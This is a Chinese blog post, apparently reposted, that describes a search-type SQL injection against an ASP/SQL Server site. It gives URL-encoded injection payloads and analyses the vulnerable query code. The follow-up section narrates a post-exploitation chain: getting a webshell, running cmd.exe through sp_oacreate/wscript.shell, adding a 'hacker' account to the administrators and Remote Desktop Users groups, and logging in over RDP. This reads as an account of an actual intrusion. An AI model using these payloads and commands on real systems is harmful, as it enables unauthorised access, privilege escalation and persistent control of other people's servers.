典型的搜索型注入

2019独角兽企业重金招聘Python工程师标准>>>

直接入主题了。注入点“http://www.site.com/Train_List.asp?xyz=” 特点是无需变量就能注入，但反应速度极慢。 进入主页www.site.com ，发现除了几个搜索框，基本上没有能下手的地方。在搜索框里加“'”，点 ...

直接入主题了。
注入点“http://www.site.com/Train_List.asp?xyz=” 
特点是无需变量就能注入，但反应速度极慢。

进入主页www.site.com ，发现除了几个搜索框，基本上没有能下手的地方。
在搜索框里加“'”，点击“搜索”，得到出错页面“http://www.site.com/main.asp?xyz='”

出错信息：
Microsoft OLE DB Provider for SQL Server 错误 '80040e14' 
字符串 ' order by gceek' 之前有未闭合的引号。 
/Train_List.asp，行 25

在搜索框里加“%”，点击“搜索”，大约1分钟后（数据多的关系，不是网速慢），得到正常显示的页面“http://www.sitel.com/main.asp?xyz=%”

猜测存在搜索型注入。
进一步测试，弄个能查询到的关键字“北京”，在输入框里输入“北京%' and '1'='1' and '%'='”和“北京%' and '1'='2' and '%'='”分别搜索，得到的页面一样，都是没有数据的空页面。

结合上面的出错信息，猜测“http://www.site.com/main.asp“只是调用页面，真正存在注入的应该是“http://www.site.com /Train_List.asp” 。

在google搜索“http://www.site.com/Train_List.asp” ，找到一条纪录“http://www.site.com /Train_List.asp?xyz=%C9%CF%BA%A3”，点击可以正常打开，显示的是关键词“上海”的搜索结果（“%C9%CF%BA%A3”是“上海”的url编码）。

结合前面的信息，已经可以确定http://www.site.com /Train_List.asp的参数就是xyz，进一步测试：
http://www.site.com/Train_List.asp?xyz= %B1%B1%BE%A9%25%27%20%61%6E%64%20%27%31%27%3D%27%31%27%20%61%6E%64%20%27%25%27%3D%27
（“北京%' and '1'='1' and '%'='”的url编码）

返回关键词“北京”的搜索结果。

http://www.site.com/Train_List.asp?xyz= %B1%B1%BE%A9%25%27%20%61%6E%64%20%27%31%27%3D%27%32%27%20%61%6E%64%20%27%25%27%3D%27
（“北京%' and '1'='2' and '%'='”的url编码）

返回没有数据的空白页面。

这就可以确定是存在注入点了。
挑一个相关数据最少的关键词“广东东”（为了加快反应速度），构造url： “http://www.site.com/Train_List.asp?xyz=广东东%” 放进注入漏洞扫描器开扫，呵呵，速度飞快，很快就什么都出来了。

那么“http://www.site.com/Train_List.asp?xyz=”为什么不需变量也能注入呢？
结合拿到的源码分析一下

关键语句
elseif xyz<>"" then
sql="select * from Train_all where lm like '%"&xyz&"%' order by gceek"

简单判断参数“xyz”不为空，则代入查询。

代入我们之前构造的语句 “北京%' and '1'='1' and '%'='”
sql="select * from Train_all where lm like '%北京%' and '1'='1' and '%'='%' order by gceek"
构成注入，得到的结果是所有包含关键字“北京”的数据。

代入不带变量的构造语句 “' and '1'='1' and '%'='”
sql="select * from Train_all where lm like '%' and '1'='1' and '%'='%' order by gceek"
也构成注入，因为“%”是通配符，得到的结果是所查询数据表里的所有数据。

不带变量注入的时候，每次查询，服务器都要返回所查询数据表里的所有数据，反应速度当然就慢了。

后续：
之后就容易了，sa权限的注入点，管理员设置的比较严谨，删除了xp_cmdshell存储扩展和xplog70.dll文件。拿到的webshell没有写和删除的权限，有读和修改的权限。修改webshell为asp探针的代码，得知存在wscript.shell （命令行执行组件），找到连接帐户和密码，用查询分析器连上，执行
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod 
@shell ,'run',null,'c:\windows\system32\cmd.exe /c net user hacker xxxxxxxxxxxxxx /add' 成功添加用户。

（sp_oacreate：运行CMD并显示回显的要求是wscript.shell和scripting.FileSystemObject可用）

之后我就直接用工具NBSI执行命令了。
net localgroup administrators hacker /add
net user hacker /active:yes
net localgroup "Remote Desktop Users" hacker /add
成功登陆3389。

转载于:https://my.oschina.net/softwarechina/blog/180283